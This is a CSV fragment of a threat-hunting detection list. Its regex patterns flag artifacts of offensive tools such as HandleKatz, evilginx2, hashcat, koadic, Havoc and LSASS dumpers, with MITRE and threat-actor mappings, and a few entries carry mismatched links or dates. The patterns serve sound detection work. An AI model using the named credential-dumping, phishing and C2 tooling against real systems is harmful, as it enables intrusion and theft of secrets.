- Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46992"
"*handlekatz_bof.*",".{0,1000}handlekatz_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","46993"
"*handlekatz_dump*",".{0,1000}handlekatz_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","46994"
"*HANDLEKATZ_EXE_NAME=*",".{0,1000}HANDLEKATZ_EXE_NAME\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46995"
"*handlePhishlets*",".{0,1000}handlePhishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux #content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","46996"
"*handshake*jasmin@123*",".{0,1000}\""handshake\"",\s\""jasmin\@123\"".{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","46997"
"*Hangingsword/HouQing*",".{0,1000}Hangingsword\/HouQing.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","46998"
"*Happy Hacking*Enjoy Dump!*",".{0,1000}Happy\sHacking.{0,1000}Enjoy\sDump!.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","46999"
"*Happycat@cyberfear.com*",".{0,1000}Happycat\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47000"
"*HardHatC2*",".{0,1000}HardHatC2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47001"
"*hardhatc2.com*",".{0,1000}hardhatc2\.com.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47002"
"*HardHatC2Client*",".{0,1000}HardHatC2Client.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47003"
"*HarmJ0y/DAMP*",".{0,1000}HarmJ0y\/DAMP.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","47004"
"*HarvestBrowserPasswords.exe*",".{0,1000}HarvestBrowserPasswords\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47005"
"*HarvestBrowserPasswords.pdb*",".{0,1000}HarvestBrowserPasswords\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47006"
"*harvestcrop.exe * *",".{0,1000}harvestcrop\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","47007"
"*has no pre auth required. Dumping hash to crack offline:*",".{0,1000}has\sno\spre\sauth\srequired\.\sDumping\shash\sto\scrack\soffline\:.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","47008"
"*HasAutoAdminLogonCredentials*",".{0,1000}HasAutoAdminLogonCredentials.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","47009"
"*hash3liZer/SillyRAT*",".{0,1000}hash3liZer\/SillyRAT.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","47010"
"*hash3liZer/wifijammer*",".{0,1000}hash3liZer\/wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","N/A","3","202","44","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z","47011"
"*Hash-Buster*",".{0,1000}Hash\-Buster.{0,1000}","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","N/A","10","1809","401","2024-12-10T13:50:26Z","2017-07-03T17:28:51Z","47012"
"*hashcat*",".{0,1000}hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47013"
"*hashcat-*.7z*",".{0,1000}hashcat\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47014"
"*hashcat.git*",".{0,1000}hashcat\.git.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47015"
"*hashcat/hashcat*",".{0,1000}hashcat\/hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","1","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","47016"
"*hashcat-rule-master*",".{0,1000}hashcat\-rule\-master.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","47017"
"*hashdump.py*",".{0,1000}hashdump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","47018"
"*hashdump.rb*",".{0,1000}hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47019"
"*hashdump.x64.dll*",".{0,1000}hashdump\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","47020"
"*hashdump_sam*",".{0,1000}hashdump_sam.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47021"
"*HashDumpDCImplant*",".{0,1000}HashDumpDCImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47022"
"*HashDumpSAMImplant*",".{0,1000}HashDumpSAMImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47023"
"*hashedBootKey CheckSum failed, Syskey startup password probably in use! :(*",".{0,1000}hashedBootKey\sCheckSum\sfailed,\sSyskey\sstartup\spassword\sprobably\sin\suse!\s\:\(.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","47024"
"*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","47025"
"*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","47026"
"*hasherezade/persistence_demos*",".{0,1000}hasherezade\/persistence_demos.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","47027"
"*-hashes* --escalate-user*",".{0,1000}\-hashes.{0,1000}\s\-\-escalate\-user.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","47028"
"*hashonymize --ntds * --kerberoast *",".{0,1000}hashonymize\s\-\-ntds\s.{0,1000}\s\-\-kerberoast\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47029"
"*HashPals/Name-That-Hash*",".{0,1000}HashPals\/Name\-That\-Hash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47030"
"*--hash-type 1000 --potfile-path*.ntds.cracked*",".{0,1000}\-\-hash\-type\s1000\s\-\-potfile\-path.{0,1000}\.ntds\.cracked.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47031"
"*hashview*@*localhost*",".{0,1000}hashview.{0,1000}\@.{0,1000}localhost.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47032"
"*hashview/config.conf*",".{0,1000}hashview\/config\.conf.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47033"
"*hashview/hashview*",".{0,1000}hashview\/hashview.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47034"
"*hashview-agent.*.tgz*",".{0,1000}hashview\-agent\..{0,1000}\.tgz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47035"
"*hashview-agent.py*",".{0,1000}hashview\-agent\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47036"
"*HasSPNNoPreauth*",".{0,1000}HasSPNNoPreauth.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","47037"
"*hatlord/snmpwn*",".{0,1000}hatlord\/snmpwn.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with  Unknown user name  when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","47038"
"*hausec/ADAPE-Script*",".{0,1000}hausec\/ADAPE\-Script.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","47039"
"*hausec/ProxyLogon*",".{0,1000}hausec\/ProxyLogon.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","47040"
"*havoc client*",".{0,1000}havoc\sclient.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47041"
"*havoc server*",".{0,1000}havoc\sserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47042"
"*havoc.agent*",".{0,1000}havoc\.agent.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47043"
"*Havoc.git*",".{0,1000}Havoc\.git.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47044"
